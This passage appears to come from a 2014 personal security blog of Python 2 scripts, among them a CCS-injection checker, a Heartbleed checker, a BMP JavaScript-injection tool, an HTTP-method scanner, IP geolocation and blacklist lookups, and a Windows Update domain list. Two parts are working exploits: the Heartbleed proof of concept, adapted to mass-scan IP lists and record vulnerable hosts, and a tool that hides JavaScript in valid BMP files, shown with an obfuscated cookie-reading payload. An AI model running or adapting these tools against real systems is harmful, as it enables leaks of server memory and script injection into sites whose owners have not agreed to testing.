if (iRecordLen + 5 < iSSLLen):
#log(2,"Multiple Handshakes")
lstRecords.append((iShakeProtocol,iType))
iLoopStopper = 0
iNextOffset = iRecordLen + 9
while iNextOffset < len(strBuf):
iLoopStopper += 1
iCount = 0
while ((iNextOffset+4) > len(strBuf) and iCount < 5):
#log(2,"Need more data to fill buffer")
iCount += 1
rule.waitForData()
if len(rule.buffer) > 0:
strBuf += rule.buffer
if ((iNextOffset+4) > len(strBuf)):
#log(2,"End of message")
break
iTypeAndLen = struct.unpack(">I",strBuf[iNextOffset:iNextOffset+4])[0]
iRecordLen = iTypeAndLen & (0x00FFFFFF)
iType = (iTypeAndLen & (0xFF000000))>>24
lstRecords.append((iShakeProtocol,iType))
iNextOffset += (iRecordLen + 4)
if iLoopStopper > 8:
break
return lstRecords
elif (iRecordLen + 9 < len(strBuf)):
#log(2,"Multiple Records")
lstRecords.append((iShakeProtocol,iType))
iNextOffset = iRecordLen + 9
iLoopStopper = 0
while iNextOffset+6 < len(strBuf):
iLoopStopper += 1
iShakeProtocol = struct.unpack(">B",strBuf[iNextOffset])[0]
iRecordLen = struct.unpack(">H",strBuf[iNextOffset+3:iNextOffset+5])[0]
iType = struct.unpack(">B",strBuf[iNextOffset+5])[0]
#log(2,"iShakeProto == %d, iRecordLen == %d, iType == %d",iShakeProtocol,iRecordLen,iType)
lstRecords.append((iShakeProtocol,iType))
iNextOffset += iRecordLen + 5
if iLoopStopper > 8:
break
return lstRecords
elif (iRecordLen + 9 == len(strBuf)):
#log(2,"Single record")
sslStatus = checkSSLHeader(strBuf)
lstRecords.append((sslStatus[0],sslStatus[2]))
return lstRecords
return None
def checkSSLHeader(strBuf):
if len(strBuf)>=6:
sslStatus = struct.unpack('>BHHI', strBuf[0:9])
iType = (sslStatus[3] & (0xFF000000))>>24
iRecordLen = sslStatus[3] & (0x00FFFFFF)
iShakeProtocol = sslStatus[0]
iSSLLen = sslStatus[2]
return (iShakeProtocol,iSSLLen,iType,iRecordLen)
return None
def makeHello(strSSLVer):
r = "\x16" # Message Type 22
r += dSSL[strSSLVer]
strCiphers = ""
for c in ssl3_cipher.keys():
strCiphers += c
dLen = 43 + len(strCiphers)
r += struct.pack("!H",dLen)
h = "\x01"
strPlen = struct.pack("!L",dLen-4)
h+=strPlen[1:]
h+= dSSL[strSSLVer]
rand = struct.pack("!L", int(time.time()))
rand += "\x36\x24\x34\x16\x27\x09\x22\x07\xd7\xbe\xef\x69\xa1\xb2"
rand += "\x37\x23\x14\x96\x27\xa9\x12\x04\xe7\xce\xff\xd9\xae\xbb"
h+=rand
h+= "\x00" # No Session ID
h+=struct.pack("!H",len(strCiphers))
h+=strCiphers
h+= "\x01\x00"
return r+h
iVulnCount = 0
for strVer in ["TLSv1.2","TLSv1.1","TLSv1","SSLv3"]:
strHello = makeHello(strVer)
strLogPre = "[%s] %s:%d" % (strVer,strHost,iPort)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((strHost,iPort))
s.settimeout(5)
except:
print "Failure connecting to %s:%d." % (strHost,iPort)
quit()
s.send(strHello)
#print "Sending %s Client Hello" % (strVer)
iCount = 0
fServerHello = False
fCert = False
fKex = False
fHelloDone = False
while iCount<5:
iCount += 1
try:
recv = s.recv(2048)
except:
continue
lstRecords = getSSLRecords(recv)
#strLogMessage = "iCount = %d; lstRecords = %s" % (iCount,lstRecords)
#log(2,strLogMessage)
if lstRecords != None and len(lstRecords) > 0:
for (iShakeProtocol,iType) in lstRecords:
if iShakeProtocol == 22:
if iType == 2:
fServerHello = True
elif iType == 11:
fCert = True
elif iType == 12:
fKex = True
elif iType == 14:
fHelloDone = True
if (fServerHello and fCert):
break
else:
#log(2, "Handshake missing or invalid. Aborting.")
continue
if not (fServerHello and fCert):
print "%s Invalid handhsake." % (strLogPre)
elif len(recv)>0:
#print "Received %d bytes. (%d)" % (len(recv),ord(recv[0]))
if ord(recv[0])==22:
iCount = 0
strChangeCipherSpec = "\x14"
strChangeCipherSpec += dSSL[strVer]
strChangeCipherSpec += "\x00\x01" # Len
strChangeCipherSpec += "\x01" # Payload CCS
#print "Sending Change Cipher Spec"
s.send(strChangeCipherSpec)
fVuln = True
strLastMessage = ""
while iCount < 5:
iCount += 1
s.settimeout(0.5)
try:
recv = s.recv(2048)
except socket.timeout:
#print "Timeout waiting for CCS reply."
continue
if (len(recv)>0):
strLastMessage = recv
if (ord(recv[0])==21):
fVuln = False
break
try:
if ord(strLastMessage[-7]) == 21: # Check if an alert was at the end of the last message.
fVuln=False
except IndexError:
pass
if fVuln:
print "[%s] %s:%d allows early CCS" % (strVer,strHost,iPort)
iVulnCount += 1
else:
print "[%s] %s:%d rejected early CCS" % (strVer,strHost,iPort)
else:
print "[%s] No response from %s:%d" % (strVer,strHost,iPort)
try:
s.close()
except:
pass
if iVulnCount > 0:
print "***This System Exhibits Potentially Vulnerable Behavior***"
quit(1)
else:
print "No need to patch."
quit(0)
Reference:
- http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/
- http://www.openssl.org/news/secadv_20140605.txt
Thanks.
Wednesday 9 April 2014
A OpenSSL HeartBleed vulnerability Python
As you know, At 8/Apr/2014, Called OpenSSL heartbleed ZeroDay bug is security vulnerability.
A hacker could gain Server's memory chuck using this vulnerability
Affected SSL version:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL
1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL
0.9.8 branch is NOT vulnerable
I need check servers, so I modified the exploit to check lots servers.
The file(lists.txt) is loading IPs should be "ip:port".
e. g,
1111:443
2222:8443
Reference:
http://www.exploit-db.com/exploits/32745/
http://heartbleed.com/
Thanks.
A hacker could gain Server's memory chuck using this vulnerability
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
'''
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
'''
def ip_n_port(i):
data = str(i).replace("\n","")
data = str(i).replace(" ","")
data = data.split(":")
ip = data[0]
port = data[1]
return ip, port
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s, ip, port):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'ip: %s, port: %s' % (ip, port)
fp = open('result.txt', 'a')
fp.write('%s:%s' % (ip, port))
fp.close()
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main(ip, port):
'''
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
'''
print ip, port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((ip, int(port)))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s, ip, port)
if __name__ == '__main__':
f = open("lists.txt", "r")
for i in f:
ip, port = ip_n_port(i)
try:
main(ip, port)
except:
print ('no connection')
f.close()
The file(lists.txt) is loading IPs should be "ip:port".
e. g,
1111:443
2222:8443
Reference:
http://www.exploit-db.com/exploits/32745/
http://heartbleed.com/
Thanks.
Monday 31 March 2014
BMP INJECTION Python.
It helps to inject source to BMP.
If you need to test uploading BMP with javascript, you could use bmpinjection.py.
If you need to test uploading BMP with javascript, you could use bmpinjection.py.
#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os
#---------------------------------------------------------
def _hexify(num):
"""
Converts and formats to hexadecimal
"""
num = "%x" % num
if len(num) % 2:
num = '0'+num
return num.decode('hex')
#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
"""
Generates a fake but valid BMP within scriting
"""
f = open(fname, "wb")
header = (b'\x42\x4D' #Signature BM
b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
b'\x00\x00\x00\x00' #Reserved
b'\x00\x00\x00\x00' #bitmap data offset
b''+ _hexify( len(payload) ) + #bitmap header size
b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
b'\x00\x00' #nb_plan
b'\x00\x00' #nb per pixel
b'\x00\x10\x00\x00' #compression type
b'\x00\x00\x00\x00' #image size .. its ignored
b'\x00\x00\x00\x01' #Horizontal resolution
b'\x00\x00\x00\x01' #Vertial resolution
b'\x00\x00\x00\x00' #number of colors
b'\x00\x00\x00\x00' #number important colors
b'\x00\x00\x00\x80' #palet colors to be complient
b'\x00\x80\xff\x80' #palet colors to be complient
b'\x80\x00\xff\x2A' #palet colors to be complient
b'\x2F\x3D\x31\x3B' #*/=1;
)
# I made this explicit, step by step .
f.write(header)
f.write(payload)
f.close()
return True
#---------------------------------------------------------
def _generate_launching_page(f):
"""
Creates the HTML launching page
"""
htmlpage ="""<html>
<head><title>Opening an image</title> </head>
<body>
<img src=\"""" + f + """\"\>
<script src= \"""" + f + """\"> </script>
</body>
</html>
"""
html = open("run.html", "wb")
html.write(htmlpage);
html.close()
return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
"""
Injects the payload into existing BMP
NOTE: if the BMP contains \xFF\x2A might caouse issues
"""
# I know, I can do it all in memory and much more fast.
# I wont do it here.
f = open(fname, "r+b")
b = f.read()
b.replace(b'\x2A\x2F',b'\x00\x00')
f.close()
f = open(fname, "w+b")
f.write(b)
f.seek(2,0)
f.write(b'\x2F\x2A')
f.close()
f = open(fname, "a+b")
f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
f.write(payload)
f.close()
return True
#---------------------------------------------------------
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("filename",help="the bmp file name to be generated/or infected")
parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
args = parser.parse_args()
print("""
|======================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
| It is the end user's responsibility to obey all applicable local, state and federal laws. |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program |
|======================================================================================================|
""")
if args.inject_to_existing_bmp:
_inject_into_file(args.js_payload, args.filename)
else:
_generate_and_write_to_file(args.js_payload, args.filename)
_generate_launching_page(args.filename)
print "[+] Finished!"
c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"
Thursday 20 March 2014
Web METHOD CHECK
Sometimes, I need to check many URLs' methods such as "TRACE", "DELETE", "PUT", "COPY".
So, I just make simple python code. :)
Readme:
url.txt : you should have url lists in same directory.
So, I just make simple python code. :)
Readme:
url.txt : you should have url lists in same directory.
import socket, sys, re
import string
def main():
# Fillter SSL PORT
ssl_port = 443
# Common Port Mode
port = ["80"]
# INTERNAL URL
urldata = open("url.txt", "r")
count = 0
for i in urldata:
count += 1
i = i.strip('\n')
for j in port:
isheader(i, int(j), count, ssl_port)
urldata.close()
print("\r\nFINISH. Thank you")
def savingR(port, num, url, msg):
fp_r = open("result_"+str(port)+".txt","a")
fp_r.write("["+str(num)+"]"+url+":"+str(port)+"-"+msg+"\r\n")
fp_r.flush()
fp_r.close()
def Msgprint(url, port, msg):
print("%s(%d): Done [%s]" %(url, port, msg))
def isheader(url, port, num, ssl_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
try:
if (ssl_port == port):
try:
s.connect((url, port))
except socket.error:
msg = "Closed port(ssl)"
Msgprint(url, port, msg)
s.close()
return 0
s_ssl = socket.ssl(s)
s_ssl.write('OPTIONS / HTTP/1.0\r\n\r\n')
buf = s_ssl.read()
s.close()
else:
try:
s.connect((url, port))
except socket.error:
msg = "Closed port"
Msgprint(url, port, msg)
s.close()
return 0
s.send("OPTIONS / HTTP/1.0\r\n\r\n".encode('utf-8'))
buf = (s.recv(1024)).decode('utf-8')
s.close()
if not buf:
msg = "Not Return from this server"
Msgprint(url, port, msg)
return 0
msg = ''.join(re.findall('Allow:.*', buf))
if (msg == ""):
msg = "Nothing"
if(''.join(re.findall('PUT', msg))) or (''.join(re.findall('COPY', msg))) or (''.join(re.findall('DELETE', msg)) or (''.join(re.findall('TRACE', msg)))):
# To save results
num = num+1
savingR(port, num, url, msg)
msg += "] [*FOUND"
Msgprint(url, port, msg)
except:
msg = "Timeout"
Msgprint(url, port, msg)
s.close()
return 0
main()
Thursday 20 February 2014
IP location information
I made to have IP location information from IPs.
Put IPs into iplists.txt, then it makes result.csv.
import urllib
def iplocation(*data):
response = urllib.urlopen('http://api.hostip.info/get_html.php?ip='+ data[0]+'&position=true').read()
return response
iplists = open('iplists.txt','r')
save = open('result.csv', 'w')
for ip in iplists:
ip = str(ip).replace("\n","")
print " "*8 + "[-] " + ip
response = iplocation(ip)
response = response.split("\n")
county = response[0].split(":")
result = county[1].strip()
save.write(ip + ",\"" + result + "\"\n")
if result:
print " "*12 + result
iplists.close()
save.close()
Put IPs into iplists.txt, then it makes result.csv.
DNS BLACK LIST Information
I need to analysis some IPs, so I need to check DNS BLACK LISTS.
Input IPs to iplists.txt, then it makes result.csv.
I made simple checking DNS black Lists using python.
import os
import re
import socket
import sys
import requests
from BeautifulSoup import BeautifulSoup
USER_AGENT = "Mozilla/5.0 (Windows NT 5.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
PRAGMA = "no-cache"
ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
def blacklist(dat):
ip = dat
type =None
status = ""
#path = "/query/bl?ip="
#path +=ip
host = "http://www.spamhaus.org/query/bl?ip="+ip
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
PRAGMA = "no-cache"
ACCEPT = "application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"
results = requests.get(host,
params = {"ip": ip},
headers = {"Host": "www.spamhaus.org",
"User-Agent": USER_AGENT,
"Accept": ACCEPT,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "ko-KR",
"Connection": "keep-alive"
}
)
try:
html = results.text
except UnicodeDecodeError:
html = u' '.join(results.text).encode('utf-8').strip()
soup = BeautifulSoup(html)
tag = soup.findAll('b')
for item in tag:
if "is listed in the" in item.text:
#print item.text
status = "Block"
return status
else :
status = "Allow"
return status
iplists = open('iplists.txt','r')
save = open('result.csv', 'w')
for ip in iplists:
ip = str(ip).replace("\n","")
print " "*8 + "[-] " + ip
try:
result = blacklist(ip)
except UnicodeDecodeError:
result = u' '.join(blacklist(ip)).encode('utf-8').strip()
save.write(ip + ",\"" + result + "\"\n")
if result:
print " "*12 + result
iplists.close()
save.close()
Input IPs to iplists.txt, then it makes result.csv.
How to have window update IP ranges.
I have considering a problem how to get window update IP ranges.
The Window update IPs are flexibled...
I could find window update URLs. However, our firewall could not using URL information.
It could use only IP that makes the problem.
Just I share window update URL.
www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
download.windowsupdate.com
c.microsoft.com
windowsupdate.microsoft.com
v4.windowsupdate.microsoft.com
windowsupdate.com
ntservicepack.microsoft.com
wustat.windows.com
au.download.windowsupdate.com
updates.installshield.com
microsoft.com
urs.microsoft.com
go.microsoft.com
start.microsoft.com
crl.microsoft.com
catalog.update.microsoft.com
validation.sls.microsoft.com
na.activation.sls.microsoft.com
activation.sls.microsoft.com
sls.microsoft.com.nsatc.net
validation.sls.microsoft.com.nsatc.net
activation.sls.microsoft.com.nsatc.net
emea.activation.sls.microsoft.com
mpa.one.microsoft.com
download.microsoft.com
The Window update IPs are flexibled...
Subscribe to:
Posts (Atom)